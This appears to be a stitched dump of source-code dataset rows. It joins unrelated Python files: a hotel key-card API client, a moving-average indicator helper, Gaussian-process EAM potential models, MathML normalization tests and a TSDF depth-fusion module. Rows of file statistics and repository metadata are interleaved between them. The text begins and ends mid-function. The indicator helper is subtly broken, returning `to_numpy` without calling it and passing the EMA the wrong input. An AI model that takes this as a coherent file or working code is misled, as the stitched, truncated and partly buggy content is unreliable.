if is_card_use_auth == 1:
r = requests.post(url, data=params, headers=headers, auth=auth)
else:
r = requests.post(url, data=params, headers=headers)
if r:
print("headers: ")
print(r.headers)
returned = json.loads(r.text)
return returned
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_read_card4(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message="" ):
# Example Post
# {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
# "1", "format": "T", "track": "3", "message": ""}
# api-endpoint
url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
# defining header JSON
headers = {'Content-Type': 'application/json'}
# defining auth to be sent to the API
if is_card_use_auth == 1:
auth = (username, password)
# defining a params dict for the parameters to be sent to the API
params = {
'pcId': pcId,
'cmd': cmd,
'technology': technology,
'cardOperation': cardOperation,
'encoder': encoder,
'format': format,
'track': track,
'message': message,
}
if url is not None:
if is_card_use_auth == 1:
r = requests.post(url, data=params, headers=headers, auth=auth)
else:
r = requests.post(url, data=params, headers=headers)
if r:
print("headers: ")
print(r.headers)
returned = json.loads(r.text)
return returned
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting") | 32.499165 | 132 | 0.691683 | 2,776 | 19,467 | 4.688401 | 0.080331 | 0.026431 | 0.036343 | 0.056166 | 0.821975 | 0.78932 | 0.783865 | 0.778794 | 0.770419 | 0.76773 | 0 | 0.009871 | 0.156932 | 19,467 | 599 | 133 | 32.499165 | 0.783146 | 0.108697 | 0 | 0.704348 | 0 | 0 | 0.227483 | 0.003815 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036957 | false | 0.034783 | 0.013043 | 0.002174 | 0.102174 | 0.084783 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cd65ca9a9290598c75c1bf6b3829eecd62633159 | 281 | py | Python | Server/Controller/IndicatorController.py | admantiumblack/invest-trigger-fastapi | f21fb7d7b512bb80a5da3000bdb581023ac7a177 | [
"MIT"
] | null | null | null | Server/Controller/IndicatorController.py | admantiumblack/invest-trigger-fastapi | f21fb7d7b512bb80a5da3000bdb581023ac7a177 | [
"MIT"
] | null | null | null | Server/Controller/IndicatorController.py | admantiumblack/invest-trigger-fastapi | f21fb7d7b512bb80a5da3000bdb581023ac7a177 | [
"MIT"
] | null | null | null | import pandas_ta as pdt
def moving_average(prices, period, limit):
res = pdt.sma(prices['prices'], period)
return res.iloc[-limit:].to_numpy()
def exponential_moving_average(prices, period, limit):
res = pdt.ema(prices, period)
return res.iloc[-limit:].to_numpy | 25.545455 | 54 | 0.711744 | 41 | 281 | 4.731707 | 0.463415 | 0.247423 | 0.195876 | 0.257732 | 0.752577 | 0.752577 | 0.752577 | 0.381443 | 0 | 0 | 0 | 0 | 0.153025 | 281 | 11 | 55 | 25.545455 | 0.815126 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
26e66627ab2a463b600658a3439cd1d4ee9df608 | 20,669 | py | Python | mff/models/eam.py | alvarovm/mff | cd1b22b606dfd64d91dc94fece72ad6a707212af | [
"Apache-2.0"
] | 14 | 2019-03-22T18:57:34.000Z | 2021-12-15T11:37:17.000Z | mff/models/eam.py | alvarovm/mff | cd1b22b606dfd64d91dc94fece72ad6a707212af | [
"Apache-2.0"
] | 4 | 2019-06-18T14:55:46.000Z | 2019-11-26T19:34:59.000Z | mff/models/eam.py | alvarovm/mff | cd1b22b606dfd64d91dc94fece72ad6a707212af | [
"Apache-2.0"
] | 3 | 2019-08-05T14:42:20.000Z | 2022-03-16T18:48:54.000Z | # -*- coding: utf-8 -*-
import json
import warnings
from itertools import combinations_with_replacement
from pathlib import Path
import numpy as np
from mff import gp, interpolation, kernels, utility
from mff.models.base import Model
class NpEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NpEncoder, self).default(obj)
def get_max_eam(X, rc, r0):
t_max = 0
for c in X:
dist = np.sum(c[:, :3]**2, axis=1)**0.5
cut_1 = 0.5*(1 + np.cos(np.pi*dist/rc))
t1 = np.exp(-(dist/r0 - 1))
t2 = -sum(cut_1*t1)**0.5
if t2 < t_max:
t_max = t2
return t_max
def get_max_eam_energy(X_glob, rc, r0):
t_max = 0
for X in X_glob:
t2 = get_max_eam(X, rc, r0)
if t2 < t_max:
t_max = t2
return t_max
class EamSingleSpeciesModel(Model):
""" Eam single species model class
Class managing the Gaussian process and its mapped counterpart
Args:
element (int): The atomic number of the element considered
r_cut (foat): The cutoff radius used to carve the atomic environments
sigma (foat): Lengthscale parameter of the Gaussian process
theta (float): decay ratio of the cutoff function in the Gaussian Process
noise (float): noise value associated with the training output data
Attributes:
gp (method): The eam single species Gaussian Process
grid (method): The eam single species tabulated potential
grid_start (float): Minimum descriptor value for which the grid is defined
grid_end (float): Maximum descriptor value for which the grid is defined
grid_num (int): number of points used to create the eam multi grid
"""
def __init__(self, element, r_cut, sigma, r0, noise, **kwargs):
super().__init__()
self.element = element
self.r_cut = r_cut
kernel = kernels.EamSingleSpeciesKernel(
theta=[sigma, r_cut, r0])
self.gp = gp.GaussianProcess(kernel=kernel, noise=noise, **kwargs)
self.grid, self.grid_start, self.grid_end, self.grid_num = None, None, None, None
def fit(self, confs, forces, ncores=1):
""" Fit the GP to a set of training forces using a
eam single species force-force kernel
Args:
confs (list): List of M x 5 arrays containing coordinates and
atomic numbers of atoms within a cutoff from the central one
forces (array) : Array containing the vector forces on
the central atoms of the training configurations
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
self.gp.fit(confs, forces, ncores=ncores)
def fit_energy(self, glob_confs, energies, ncores=1):
""" Fit the GP to a set of training energies using a
eam single species energy-energy kernel
Args:
glob_confs (list of lists): List of configurations arranged so that
grouped configurations belong to the same snapshot
energies (array) : Array containing the total energy of each snapshot
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
self.gp.fit_energy(glob_confs, energies, ncores=ncores)
def fit_force_and_energy(self, confs, forces, glob_confs, energies, ncores=1):
""" Fit the GP to a set of training forces and energies using
eam single species force-force, energy-force and energy-energy kernels
Args:
confs (list): List of M x 5 arrays containing coordinates and
atomic numbers of atoms within a cutoff from the central one
forces (array) : Array containing the vector forces on
the central atoms of the training configurations
glob_confs (list of lists): List of configurations arranged so that
grouped configurations belong to the same snapshot
energies (array) : Array containing the total energy of each snapshot
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
self.gp.fit_force_and_energy(
confs, forces, glob_confs, energies, ncores=ncores)
def predict(self, confs, return_std=False, ncores=1):
""" Predict the forces acting on the central atoms of confs using a GP
Args:
confs (list): List of M x 5 arrays containing coordinates and
atomic numbers of atoms within a cutoff from the central one
return_std (bool): if True, returns the standard deviation
associated to predictions according to the GP framework
Returns:
forces (array): array of force vectors predicted by the GP
forces_errors (array): errors associated to the force predictions,
returned only if return_std is True
"""
return self.gp.predict(confs, return_std, ncores=ncores)
def predict_energy(self, glob_confs, return_std=False, ncores=1):
""" Predict the global energies of the central atoms of confs using a GP
Args:
glob_confs (list of lists): List of configurations arranged so that
grouped configurations belong to the same snapshot
return_std (bool): if True, returns the standard deviation
associated to predictions according to the GP framework
Returns:
energies (array) : Array containing the total energy of each snapshot
energies_errors (array): errors associated to the energies predictions,
returned only if return_std is True
"""
return self.gp.predict_energy(glob_confs, return_std, ncores=ncores)
def save_gp(self, filename):
""" Saves the GP object, now obsolete
"""
warnings.warn('use save and load function', DeprecationWarning)
self.gp.save(filename)
def load_gp(self, filename):
""" Loads the GP object, now obsolete
"""
warnings.warn('use save and load function', DeprecationWarning)
self.gp.load(filename)
def build_grid(self, num, ncores=1):
""" Build the mapped eam potential.
Calculates the energy predicted by the GP for a configuration which eam descriptor
is evalued between start and end. These energies are stored and a 1D spline
interpolation is created, which can be used to predict the energy and, through its
analytic derivative, the force associated to any embedded atom.
The prediction is done by the ``calculator`` module which is built to work within
the ase python package.
Args:
num (int): number of points to use in the grid of the mapped potential
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
if 'force' in self.gp.fitted:
self.grid_start = 3.0 * \
get_max_eam(self.gp.X_train_, self.r_cut,
self.gp.kernel.theta[2])
else:
self.grid_start = 3.0 * \
get_max_eam_energy(self.gp.X_glob_train_, self.r_cut,
self.gp.kernel.theta[2])
self.grid_end = 0
self.grid_num = num
dists = list(np.linspace(self.grid_start,
self.grid_end, self.grid_num))
grid_data = self.gp.predict_energy(dists, ncores=ncores, mapping=True)
self.grid = interpolation.Spline1D(dists, grid_data)
def save(self, path):
""" Save the model.
This creates a .json file containing the parameters of the model and the
paths to the GP objects and the mapped potential, which are saved as
separate .gpy and .gpz files, respectively.
Args:
path (str): path to the file
"""
if not isinstance(path, Path):
path = Path(path)
params = {
'model': self.__class__.__name__,
'element': self.element,
'r_cut': self.r_cut,
'fitted': self.gp.fitted,
'gp': {
'kernel': self.gp.kernel.kernel_name,
'n_train': self.gp.n_train,
'sigma': self.gp.kernel.theta[0],
'noise': self.gp.noise,
'r0': self.gp.kernel.theta[2]
},
'grid': {
'r_min': self.grid_start,
'r_max': self.grid_end,
'r_num': self.grid_num,
'filename': {}
} if self.grid else {}
}
gp_filename = "GP_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npy".format(
p=params)
params['gp']['filename'] = gp_filename
self.gp.save(path / gp_filename)
if self.grid:
grid_filename = 'GRID_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npz'.format(
p=params)
params['grid']['filename'] = grid_filename
self.grid.save(path / grid_filename)
with open(path / 'MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json'.format(p=params), 'w') as fp:
json.dump(params, fp, indent=4, cls=NpEncoder)
print("Saved model with name: MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json".format(p=params))
@classmethod
def from_json(cls, path):
""" Load the model.
Loads the model, the associated GP and the mapped potential, if available.
Args:
path (str): path to the .json model file
Return:
model (obj): the model object
"""
if not isinstance(path, Path):
path = Path(path)
directory, prefix = path.parent, path.stem
with open(path) as fp:
params = json.load(fp)
model = cls(params['element'],
params['r_cut'],
params['gp']['sigma'],
params['gp']['noise'],
params['gp']['r0'])
gp_filename = params['gp']['filename']
model.gp.load(directory / gp_filename)
if params['grid']:
grid_filename = params['grid']['filename']
model.grid = interpolation.Spline1D.load(directory / grid_filename)
model.grid_start = params['grid']['r_min']
model.grid_end = params['grid']['r_max']
model.grid_num = params['grid']['r_num']
return model
class EamManySpeciesModel(Model):
""" Eam many species model class
Class managing the Gaussian process and its mapped counterpart
Args:
elements (int): The atomic numbers of the element considered
r_cut (foat): The cutoff radius used to carve the atomic environments
sigma (foat): Lengthscale parameter of the Gaussian process
r0 (float): radius in the exponent of the eam descriptor
noise (float): noise value associated with the training output data
Attributes:
gp (method): The eam single species Gaussian Process
grid (method): The eam single species tabulated potential
grid_start (float): Minimum descriptor value for which the grid is defined
grid_end (float): Maximum descriptor value for which the grid is defined
grid_num (int): number of points used to create the eam multi grid
"""
def __init__(self, elements, r_cut, sigma, r0, noise, **kwargs):
super().__init__()
self.elements = list(np.sort(elements))
self.r_cut = r_cut
kernel = kernels.EamManySpeciesKernel(
theta=[sigma, r_cut, r0])
self.gp = gp.GaussianProcess(kernel=kernel, noise=noise, **kwargs)
self.grid, self.grid_start, self.grid_end, self.grid_num = {}, None, None, None
def fit(self, confs, forces, ncores=1):
""" Fit the GP to a set of training forces using a
eam single species force-force kernel
Args:
confs (list): List of M x 5 arrays containing coordinates and
atomic numbers of atoms within a cutoff from the central one
forces (array) : Array containing the vector forces on
the central atoms of the training configurations
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
self.gp.fit(confs, forces, ncores=ncores)
def fit_energy(self, glob_confs, energies, ncores=1):
""" Fit the GP to a set of training energies using a
eam single species energy-energy kernel
Args:
glob_confs (list of lists): List of configurations arranged so that
grouped configurations belong to the same snapshot
energies (array) : Array containing the total energy of each snapshot
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
self.gp.fit_energy(glob_confs, energies, ncores=ncores)
def fit_force_and_energy(self, confs, forces, glob_confs, energies, ncores=1):
""" Fit the GP to a set of training forces and energies using
eam single species force-force, energy-force and energy-energy kernels
Args:
confs (list): List of M x 5 arrays containing coordinates and
atomic numbers of atoms within a cutoff from the central one
forces (array) : Array containing the vector forces on
the central atoms of the training configurations
glob_confs (list of lists): List of configurations arranged so that
grouped configurations belong to the same snapshot
energies (array) : Array containing the total energy of each snapshot
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
self.gp.fit_force_and_energy(
confs, forces, glob_confs, energies, ncores=ncores)
def predict(self, confs, return_std=False, ncores=1):
""" Predict the forces acting on the central atoms of confs using a GP
Args:
confs (list): List of M x 5 arrays containing coordinates and
atomic numbers of atoms within a cutoff from the central one
return_std (bool): if True, returns the standard deviation
associated to predictions according to the GP framework
Returns:
forces (array): array of force vectors predicted by the GP
forces_errors (array): errors associated to the force predictions,
returned only if return_std is True
"""
return self.gp.predict(confs, return_std, ncores=ncores)
def predict_energy(self, glob_confs, return_std=False, ncores=1):
""" Predict the global energies of the central atoms of confs using a GP
Args:
glob_confs (list of lists): List of configurations arranged so that
grouped configurations belong to the same snapshot
return_std (bool): if True, returns the standard deviation
associated to predictions according to the GP framework
Returns:
energies (array) : Array containing the total energy of each snapshot
energies_errors (array): errors associated to the energies predictions,
returned only if return_std is True
"""
return self.gp.predict_energy(glob_confs, return_std, ncores=ncores)
def save_gp(self, filename):
""" Saves the GP object, now obsolete
"""
warnings.warn('use save and load function', DeprecationWarning)
self.gp.save(filename)
def load_gp(self, filename):
""" Loads the GP object, now obsolete
"""
warnings.warn('use save and load function', DeprecationWarning)
self.gp.load(filename)
def build_grid(self, num, ncores=1):
""" Build the mapped eam potential.
Calculates the energy predicted by the GP for a configuration which eam descriptor
is evalued between start and end. These energies are stored and a 1D spline
interpolation is created, which can be used to predict the energy and, through its
analytic derivative, the force associated to any embedded atom.
The prediction is done by the ``calculator`` module which is built to work within
the ase python package.
Args:
num (int): number of points to use in the grid of the mapped potential
ncores (int): number of CPUs to use for the gram matrix evaluation
"""
if 'force' in self.gp.fitted:
self.grid_start = 3.0 * \
get_max_eam(self.gp.X_train_, self.r_cut,
self.gp.kernel.theta[2])
else:
self.grid_start = 3.0 * \
get_max_eam_energy(self.gp.X_glob_train_, self.r_cut,
self.gp.kernel.theta[2])
self.grid_end = 0
self.grid_num = num
dists = list(np.linspace(self.grid_start,
self.grid_end, self.grid_num))
for el in self.elements:
grid_data = self.gp.predict_energy(dists, ncores=ncores, mapping=True, alpha_1_descr=el)
self.grid[(el)] = interpolation.Spline1D(dists, grid_data)
def save(self, path):
""" Save the model.
This creates a .json file containing the parameters of the model and the
paths to the GP objects and the mapped potential, which are saved as
separate .gpy and .gpz files, respectively.
Args:
path (str): path to the file
"""
if not isinstance(path, Path):
path = Path(path)
params = {
'model': self.__class__.__name__,
'elements': self.elements,
'r_cut': self.r_cut,
'fitted': self.gp.fitted,
'gp': {
'kernel': self.gp.kernel.kernel_name,
'n_train': self.gp.n_train,
'sigma': self.gp.kernel.theta[0],
'noise': self.gp.noise,
'r0': self.gp.kernel.theta[2]
},
'grid': {
'r_min': self.grid_start,
'r_max': self.grid_end,
'r_num': self.grid_num,
'filename': {}
} if self.grid else {}
}
gp_filename = "GP_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npy".format(
p=params)
params['gp']['filename'] = gp_filename
self.gp.save(path / gp_filename)
for k, grid in self.grid.items():
key = str(k)
grid_filename = "GRID_{}_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.npz".format(
key, p=params)
params['grid']['filename'][key] = grid_filename
grid.save(path / grid_filename)
with open(path / "MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json".format(p=params), 'w') as fp:
json.dump(params, fp, indent=4, cls=NpEncoder)
print("Saved model with name: MODEL_ker_{p[gp][kernel]}_ntr_{p[gp][n_train]}.json".format(p=params))
@classmethod
def from_json(cls, path):
""" Load the model.
Loads the model, the associated GP and the mapped potential, if available.
Args:
path (str): path to the .json model file
Return:
model (obj): the model object
"""
if not isinstance(path, Path):
path = Path(path)
directory, prefix = path.parent, path.stem
with open(path) as fp:
params = json.load(fp)
model = cls(params['elements'],
params['r_cut'],
params['gp']['sigma'],
params['gp']['noise'],
params['gp']['r0'])
gp_filename = params['gp']['filename']
model.gp.load(directory / gp_filename)
if params['grid']:
model.grid_start = params['grid']['r_min']
model.grid_end = params['grid']['r_max']
model.grid_num = params['grid']['r_num']
for key, grid_filename in params['grid']['filename'].items():
k = tuple(key)
model.grid[k] = interpolation.Spline1D.load(
directory / grid_filename)
return model
| 37.717153 | 108 | 0.601287 | 2,683 | 20,669 | 4.526277 | 0.105106 | 0.020751 | 0.01087 | 0.018939 | 0.911067 | 0.903327 | 0.891798 | 0.887681 | 0.887681 | 0.881917 | 0 | 0.005773 | 0.312787 | 20,669 | 547 | 109 | 37.786106 | 0.849197 | 0.430645 | 0 | 0.713043 | 0 | 0.008696 | 0.0891 | 0.038351 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.030435 | 0 | 0.204348 | 0.008696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
26f981b5f4863b73b97912d52e167354264db414 | 1,363 | py | Python | utilities/test/norm_mrow_test.py | frozstone/concept | 359a386941d0752fd9ecf97edaa4e69c52952513 | [
"MIT"
] | 2 | 2018-01-21T20:06:37.000Z | 2020-05-26T00:11:05.000Z | utilities/test/norm_mrow_test.py | frozstone/concept | 359a386941d0752fd9ecf97edaa4e69c52952513 | [
"MIT"
] | null | null | null | utilities/test/norm_mrow_test.py | frozstone/concept | 359a386941d0752fd9ecf97edaa4e69c52952513 | [
"MIT"
] | null | null | null | from norm_mrow import norm_mrow
if __name__ == '__main__':
dtd = '<!DOCTYPE math SYSTEM "../resources/xhtml-math11-f.dtd">'
n = norm_mrow(dtd)
assert(n.normalize('<math><mrow><mn>3</mn></mrow><mo>+</mo><mrow><mi>i</mi></mrow></math>') == '<math><mn>3</mn><mo>+</mo><mi>i</mi></math>')
assert(n.normalize('<math><msub><mi>x</mi><mrow><mn>2</mn></mrow></msub></math>') == '<math><msub><mi>x</mi><mn>2</mn></msub></math>')
assert(n.normalize('<math><msub><mi>x</mi><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mi>x</mi><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
assert(n.normalize('<math><msub><mrow><mi>x</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mi>x</mi><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
assert(n.normalize('<math><msub><mrow><mi>x</mi><mo>*</mo><mi>y</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mrow><mi>x</mi><mo>*</mo><mi>y</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
assert(n.normalize('<math><msub><mrow><mi>x</mi><mo>*</mo><mrow><mi>y</mi></mrow></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>') == '<math><msub><mrow><mi>x</mi><mo>*</mo><mi>y</mi></mrow><mrow><mn>2</mn><mo>+</mo><mi>k</mi></mrow></msub></math>')
| 113.583333 | 270 | 0.548056 | 254 | 1,363 | 2.897638 | 0.110236 | 0.146739 | 0.097826 | 0.097826 | 0.764946 | 0.752717 | 0.752717 | 0.747283 | 0.713315 | 0.713315 | 0 | 0.010811 | 0.04989 | 1,363 | 11 | 271 | 123.909091 | 0.557529 | 0 | 0 | 0 | 0 | 1.2 | 0.785767 | 0.763756 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
f8bc799859c752672b4df0d1c5d89a02c6760b87 | 30,452 | py | Python | tsdf/ewa.py | Algomorph/LevelSetFusion-Python | 46625cd185da4413f9afaf201096203ee72d3803 | [
"Apache-2.0"
] | 8 | 2019-01-30T19:01:25.000Z | 2021-03-05T14:10:51.000Z | tsdf/ewa.py | Algomorph/LevelSetFusion-Python | 46625cd185da4413f9afaf201096203ee72d3803 | [
"Apache-2.0"
] | 58 | 2018-12-19T16:57:38.000Z | 2019-06-06T19:52:36.000Z | tsdf/ewa.py | Algomorph/LevelSetFusion-Python | 46625cd185da4413f9afaf201096203ee72d3803 | [
"Apache-2.0"
] | 2 | 2019-03-06T06:30:30.000Z | 2019-06-03T11:00:15.000Z | # ================================================================
# Created by Gregory Kramida on 1/21/19.
# Copyright (c) 2019 Gregory Kramida
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ================================================================
# EWA = Elliptical Weighted Average, this module provides routines for EWA sampling of the depth image to generate
# a TSDF
import numpy as np
import math
import math_utils.elliptical_gaussians as eg
import tsdf.common as common
import level_set_fusion_optimization as cpp_module
# C++ extension
import level_set_fusion_optimization as cpp_extension
near_clipping_distance = 0.05
def find_sampling_bounds_helper(bounds_max, depth_image, voxel_image):
start_x = int(voxel_image[0] - bounds_max[0])
end_x = int(math.ceil(voxel_image[0] + bounds_max[0] + 1))
start_y = int(voxel_image[1] - bounds_max[1])
end_y = int(math.ceil(voxel_image[1] + bounds_max[1] + 1))
if end_y <= 0 or start_y >= depth_image.shape[0] or end_x <= 0 or start_x >= depth_image.shape[1]:
return None
start_y = max(0, start_y)
end_y = min(depth_image.shape[0], end_y)
start_x = max(0, start_x)
end_x = min(depth_image.shape[1], end_x)
return start_x, end_x, start_y, end_y
def find_sampling_bounds_inclusive_helper(bounds_max, depth_image, voxel_image):
start_x = int(voxel_image[0] - bounds_max[0])
end_x = int(math.ceil(voxel_image[0] + bounds_max[0] + 1))
start_y = int(voxel_image[1] - bounds_max[1])
end_y = int(math.ceil(voxel_image[1] + bounds_max[1] + 1))
if end_y <= 0 or start_y >= depth_image.shape[0] or end_x <= 0 or start_x >= depth_image.shape[1]:
return None
return start_x, end_x, start_y, end_y
def generate_tsdf_3d_ewa_image(depth_image, camera,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_shape=np.array([128, 128, 128]), default_value=1,
voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 3D TSDF field based on elliptical Gaussian averages (EWA) of depth values from the provided image.
Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
with a circular 2D Gaussain filter before averaging the depth values.
:type depth_image: np.ndarray
:param depth_image: depth image to use
:type camera: calib.camera.DepthCamera
:param camera: camera used to generate the depth image
:param voxel_size: voxel size, in meters
:param array_offset: offset of the TSDF grid from the world origin
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param default_value: default initial TSDF value
:param field_shape: shape of the TSDF grid to generate
:param narrow_band_width_voxels: span (in voxels) where signed distance is between -1 and 1
:param back_cutoff_voxels: where to truncate the negative voxel values (currently not supported!)
:param gaussian_covariance_scale: scale of elliptical gaussians (relative to voxel size)
:return: resulting 3D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit on
# "if signed_distance < -narrow_band_half_width" (maybe?)
if default_value == 1:
field = np.ones(field_shape, dtype=np.float32)
elif default_value == 0:
field = np.zeros(field_shape, dtype=np.float32)
else:
field = np.ndarray(field_shape, dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera.intrinsics.intrinsic_matrix[0:2, 0:2]
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for z_field in range(field_shape[2]):
for y_field in range(field_shape[1]):
for x_field in range(field_shape[0]):
# coordinates deliberately flipped here to maintain consistency between Python & C++ implementations
# Eigen Tensors being used are column-major, whereas here we use row-major layout by default
x_voxel = (z_field + array_offset[0]) * voxel_size
y_voxel = (y_field + array_offset[1]) * voxel_size
z_voxel = (x_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
# distance along ray from camera to voxel center
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
inv_z_cam = 1 / voxel_camera[2]
projection_jacobian = \
np.array([[inv_z_cam, 0, -voxel_camera[0] / z_cam_squared],
[0, inv_z_cam, -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image = voxel_image.reshape(-1, 1)
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
depth_sum = 0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
depth_sum += weight * surface_depth
weights_sum += weight
if depth_sum <= 0.0:
continue
final_depth = depth_sum / weights_sum
signed_distance = final_depth - voxel_camera[2]
field[z_field, y_field, x_field] = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
return field
# Mostly for debugging EWA -- compute matrix containing sampling areas for each field entry being considered
def sampling_area_heatmap_2d_ewa_image(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64], dtype=np.int32),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
if type(array_offset) != np.ndarray:
array_offset = np.array(array_offset).astype(np.int32)
return cpp_extension.sampling_area_heatmap_2d_ewa_image(image_y_coordinate,
depth_image,
camera.depth_unit_ratio,
camera.intrinsics.intrinsic_matrix.astype(
np.float32),
camera_extrinsic_matrix.astype(np.float32),
array_offset.astype(np.int32),
field_size,
voxel_size,
narrow_band_width_voxels,
gaussian_covariance_scale)
def generate_tsdf_3d_ewa_image_visualization_cpp(depth_image, camera, field,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
voxel_size=0.004,
array_offset=np.array([-64, -64, 64], dtype=np.int32), scale=20,
gaussian_covariance_scale=1.0):
if type(array_offset) != np.ndarray:
array_offset = np.array(array_offset).astype(np.int32)
return cpp_extension.generate_tsdf_3d_ewa_image_visualization(depth_image,
